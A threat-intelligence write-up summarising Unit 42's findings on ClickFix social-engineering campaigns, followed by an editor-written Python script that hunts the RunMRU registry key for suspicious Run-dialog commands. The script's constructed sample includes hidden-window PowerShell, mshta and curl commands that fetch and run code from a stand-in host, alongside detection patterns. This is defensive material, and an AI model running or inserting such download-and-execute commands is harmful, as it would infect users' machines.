ClickFix Pervasive in 2025, Fueling NetSupport, Latrodectus, and Lumma Stealer Infections Across Key Sectors
Category: Malware Campaign | Industries: Automotive, Energy, Financial, Government, Healthcare, Legal, Manufacturing, Mining, Professional Services, Retail, Technology, Telecommunications, Utilities, Wholesale | Source: Unit 42
Tracking the rise of ClickFix campaigns since late 2024, Unit 42 reports a steady increase in activity through the first half of 2025. The ClickFix technique, which relies on convincing users to manually execute a malicious command themselves (typically by pasting it into the Windows Run dialog), has become a common delivery mechanism for a range of malware payloads. Notable malware linked to this tactic includes NetSupport RAT, the Latrodectus downloader, and Lumma Stealer. These campaigns have impacted multiple critical sectors, with high technology (~180 incidents), financial services (~140), and manufacturing (~130) experiencing the greatest impact. Other affected sectors include retail, government, legal services, energy, and telecommunications. Unit 42 warns, "These lures can be fairly simple for threat actors to prepare, leaving organizations susceptible to credential gathering, mail theft and even ransomware incidents." Weekly infection counts rose steadily and peaked between mid-March and early April 2025.
Unit 42 reviewed three observed attack paths, each delivering a different malware payload, starting with NetSupport RAT. Those infections have been tied to the healthcare, legal, telecommunications, retail, and mining sectors. The infection chain began with lure websites imitating services such as DocuSign and Okta, suspected to run on ClearFake infrastructure. Victims were prompted to open the Run dialog and execute a PowerShell command that invoked "cmd.exe" to perform reconnaissance and download a malicious ZIP archive into the "%APPDATA%/Local/Temp/" directory. The archive contained "jp2launcher.exe" and a malicious "msvcp140.dll" loader, a DLL sideloading pair: the legitimate executable loads the attacker's DLL, which then dropped NetSupport RAT ("client32.exe"), completing the infection chain. Russian-language comments and JavaScript clipboard injection code within the ClearFake infrastructure provided additional context on the campaign's origin.
A second campaign, involving Latrodectus, surfaced between March and April 2025, again using the ClickFix method with ClearFake infrastructure. The lure prompted users to paste and run a PowerShell command that the page had silently written to their clipboard. The command was laid out so that its malicious portion fell outside the visible part of the Run dialog, leaving victims seeing only "Cloud Identificator: 2031". The hidden PowerShell window used "curl.exe" to retrieve a JavaScript file, which in turn downloaded and executed an MSI file that dropped Latrodectus as a DLL. The JavaScript padded its logic with bloated JSON variables for obfuscation, while the MSI deployed Latrodectus via DLL sideloading. The infection concluded with shellcode injection and network beaconing to attacker infrastructure.
The third major campaign analyzed involved Lumma Stealer, which has abused the ClickFix technique since late 2024, targeting industries such as automotive, energy, and technology. Attackers used "mshta.exe" to download an encoded PowerShell script that delivered the initial Lumma Stealer payload. The infection chain then ran a stager, "PartyContinued.exe", which used AutoIt scripts and CAB files to deploy the malware. Commands executed by the loader included process enumeration ("tasklist" piped to "findstr") to identify security software, directory creation via "cmd /c", CAB extraction with "extrac32", and execution of compiled AutoIt scripts (".a3x" files). The AutoIt-compiled executable launched the Lumma Stealer payload, which harvested sensitive data and exfiltrated it to attacker-controlled servers.
Unit 42 advises that traces of ClickFix campaigns can often be found in Windows artifacts such as the RunMRU registry key at "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU", which records the commands a user has executed through the Run dialog. Because the key lives in the user's hive, it persists after the malicious process has exited and survives the closing of the lure page. Defenders can additionally look for suspicious PowerShell execution patterns (interpreters such as powershell.exe or mshta.exe spawned from explorer.exe, hidden windows, encoded commands, and curl.exe or cmd.exe children) and for clipboard manipulation immediately followed by command execution. The growing prevalence of ClickFix campaigns reinforces the need for continuous monitoring, threat hunting, and user awareness to mitigate these social engineering attacks.
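As an added example of the RunMRU hunt described above (this is editor-written code, not Unit 42's tooling), the script below parses the key's layout and scores each recorded command against indicators drawn from the three chains: PowerShell or mshta.exe launched from the Run dialog, curl.exe and cmd /c children, hidden windows, encoded commands, and a long whitespace run that pushes the malicious text out of the visible part of the Run box. The registry sample is constructed for the demonstration, the lure URLs use the reserved example.invalid domain, and the assumption that the padding shows up as a whitespace run before a trailing PowerShell comment is ours; the report only says the command was laid out so that victims saw "Cloud Identificator: 2031".

```python
"""Triage RunMRU entries for ClickFix-style Run-dialog commands.

Constructed example: the registry data below is a hand-built stand-in for
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU, not data
taken from the Unit 42 report. Entry names, order and command text are
invented to resemble the infection chains described in the article.
"""
import re
from typing import Dict, List, Tuple

# Windows stores each Run-dialog command under a one-letter value name with
# a trailing "\1" marker, and the MRUList value lists those names from most
# recent to oldest. That layout is standard Windows behaviour.
CONSTRUCTED_RUNMRU: Dict[str, str] = {
    "MRUList": "cedba",
    "a": "notepad\\1",
    "b": "mshta https://example.invalid/verify.hta\\1",
    # Assumption: the visible "Cloud Identificator" text is separated from the
    # real command by a run of spaces and lives in a PowerShell comment.
    "c": ('powershell -w hidden -c "curl.exe -s https://example.invalid/x.js '
          '-o $env:TEMP\\x.js; cscript //e:jscript $env:TEMP\\x.js"'
          + " " * 40 + "# Cloud Identificator: 2031\\1"),
    "d": "\\\\fileserver\\share\\1",
    "e": ('powershell -nop -c "cmd.exe /c curl.exe -o %TEMP%\\a.zip '
          'https://example.invalid/a.zip"\\1'),
}

# (regex, label) pairs; every pattern is matched case-insensitively.
INDICATORS: List[Tuple[str, str]] = [
    (r"\bpowershell(?:\.exe)?\b", "PowerShell launched from the Run dialog"),
    (r"\bmshta(?:\.exe)?\b", "mshta.exe fetching a remote script"),
    (r"\bcurl(?:\.exe)?\b", "curl.exe download"),
    (r"\bcmd(?:\.exe)?\s+/c\b", "cmd /c child command"),
    (r"-w(?:indowstyle)?\s+h(?:idden)?\b", "hidden window"),
    (r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", "encoded command"),
    (r"\S\s{10,}\S", "long whitespace run (pads the visible text in the Run box)"),
    (r"\btasklist\b.*\bfindstr\b", "process enumeration for security tools"),
    (r"\bextrac32\b", "CAB extraction"),
]


def parse_runmru(values: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (name, command) pairs, most recent first, with the "\\1" marker stripped."""
    entries = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        entries.append((name, cmd))
    return entries


def triage(values: Dict[str, str]) -> List[dict]:
    """Return the entries that match at least one indicator, with the labels that hit."""
    flagged = []
    for name, cmd in parse_runmru(values):
        hits = [label for pat, label in INDICATORS if re.search(pat, cmd, re.IGNORECASE)]
        if hits:
            flagged.append({"name": name, "command": cmd, "hits": hits})
    return flagged


def load_live_runmru() -> Dict[str, str]:
    """Read the real key for the current user on Windows (winreg is Windows-only)."""
    import winreg
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            values[name] = data
            index += 1
    return values


if __name__ == "__main__":
    for entry in triage(CONSTRUCTED_RUNMRU):
        print(f"[{entry['name']}] {entry['command'][:70]!r}")
        for hit in entry["hits"]:
            print("   -", hit)
```

Run as-is it triages the constructed sample; on a Windows host, pass `load_live_runmru()` to `triage()` instead. The key only covers the logged-on user's hive, so for other profiles or a dead-box image you would parse the offline NTUSER.DAT with a registry parser and feed the resulting name/value pairs to the same function. The indicator list is deliberately noisy (an administrator typing "powershell" into Run will trigger it), so treat a hit as a pivot point for process-tree and network review rather than as a verdict.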